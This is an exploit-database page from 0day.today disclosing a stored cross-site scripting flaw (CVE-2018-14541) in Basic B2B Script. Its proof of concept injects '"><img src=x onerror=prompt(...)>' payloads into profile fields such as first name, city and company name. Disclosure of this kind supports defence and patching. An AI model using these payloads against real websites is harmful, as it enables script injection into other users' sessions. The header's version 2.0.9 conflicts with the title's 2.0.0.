0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Basic B2B Script 2.0.0 - Cross-Site Scripting Vulnerability

Author

Vikas Chaudhary

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

CVE

Platform

*******************************************************************************************
# Exploit Title:  PHP Scripts Mall Basic B2B Script 2.0.0 has  Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
# Site Titel : B2B Script
# Vendor Homepage:  https://www.phpscriptsmall.com/
#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/
# Software Link: http://readymadeb2bscript.com/basic-b2b/
# Category: Web Application
# Version: 2.0.9
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web:  https://gkaim.com/
#Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-14541
 
*****************************************************************************************
  
Proof of Concept:-
--------------------------
1. Go  to the  site (https://www.server.com/professional-b2b-script/ ).
2- Click on Join Free =>  Fill the Form and Create an Account  using your name email and soo on ...
3- Goto your mail and Verify it.
4-Come back to site and Login using your Verified Mail and Password.
6- When loged in ,goto My Profile  => Edit Profile and fill the these Scripts in given  parameter.
 
             in FIRST NAME =>         "><img src=x onerror=prompt(/VIKAS/)>
             in LAST NAME =>        "><img src=x onerror=prompt(/CHAUDHARY/)>
             in ADDRESS 1 =>            "><img src=x onerror=prompt(/MYAIM/)>
             in ADDRESS 2 =>     "><img src=x onerror=prompt(/GKAIM/)>
             in CITY =>       "><img src=x onerror=prompt(/HRFP/)>
             in STATE =>     "><img src=x onerror=prompt(/ETHICAL/)>
             in COMPANY NAME =>    "><img src=x onerror=prompt(/HACKER/)>
 
Now click on SUBMIT and refresh the page 
 
 
You will having popup of /VIKAS/  ,  /CHAUDHARY/ , / MYAIM/ .  /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/  in you account..
 
***************************************************************************************

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Basic B2B Script 2.0.0 - Cross-Site Scripting Vulnerability

Report Error

Report Error